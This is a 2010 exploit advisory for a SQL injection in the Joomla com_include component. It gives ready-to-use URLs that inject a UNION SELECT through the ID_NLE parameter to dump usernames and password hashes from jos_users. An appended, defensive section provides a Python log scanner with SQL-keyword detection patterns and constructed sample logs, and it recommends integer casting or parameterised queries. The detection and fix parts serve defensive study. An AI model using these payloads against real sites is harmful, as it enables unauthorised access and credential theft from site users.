Joomla Component com_include SQL Injection Vulnerability
Posted on 17 March 2010
[~]######################################### ExploiT #############################################[~]

[~] Vulnerable File : http://127.0.0.1/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=[SQL]

[~] ExploiT : -1 UNION SELECT 1

[~] Example : http://127.0.0.1/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users

[~] Demo : http://server/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users

# ~ - [ [ : Inj3ct0r : ] ]
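
[~] Detection (added example, not part of the original advisory): a Python scan of web access logs for com_include requests whose ID_NLE value is not a plain integer. It assumes ID_NLE normally carries a numeric identifier (inferred from the payload shape above, not from the component's source). The log lines, function names and patterns are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate ID_NLE is an optionally signed integer.
NUMERIC_ID = re.compile(r"-?\d+")
# SQL keywords and hex literals of the kind shown in the advisory's payload.
SQL_TOKENS = re.compile(r"\b(union|select|concat|from)\b|0x[0-9a-f]+|/\*|--", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(url):
    """Return None for a benign request, else a dict describing the finding."""
    # parse_qs percent-decodes values and turns '+' into a space.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("option", [""])[0].lower() != "com_include":
        return None
    for value in query.get("ID_NLE", []):
        value = value.strip()
        if not NUMERIC_ID.fullmatch(value):
            return {"value": value, "sql_tokens": bool(SQL_TOKENS.search(value))}
    return None

def scan(lines):
    """Return (line_number, client_ip, finding) for every suspicious entry."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        hit = check_request(match.group(1))
        if hit:
            findings.append((number, line.split()[0], hit))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Mar/2010:10:01:02 +0000] "GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=12 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [17/Mar/2010:10:03:40 +0000] "GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1%20UNION%20SELECT%201 HTTP/1.1" 200 4211',
    '203.0.113.9 - - [17/Mar/2010:10:04:11 +0000] "GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=news HTTP/1.1" 200 5002',
    '203.0.113.7 - - [17/Mar/2010:10:05:00 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for number, client, hit in scan(SAMPLE_LOG):
        label = "SQL tokens" if hit["sql_tokens"] else "non-numeric"
        print(f"line {number} {client} ID_NLE={hit['value']!r} ({label})")
```

Log review of this kind only surfaces attempts; the underlying fix is for the component to cast ID_NLE to an integer or bind it as a query parameter.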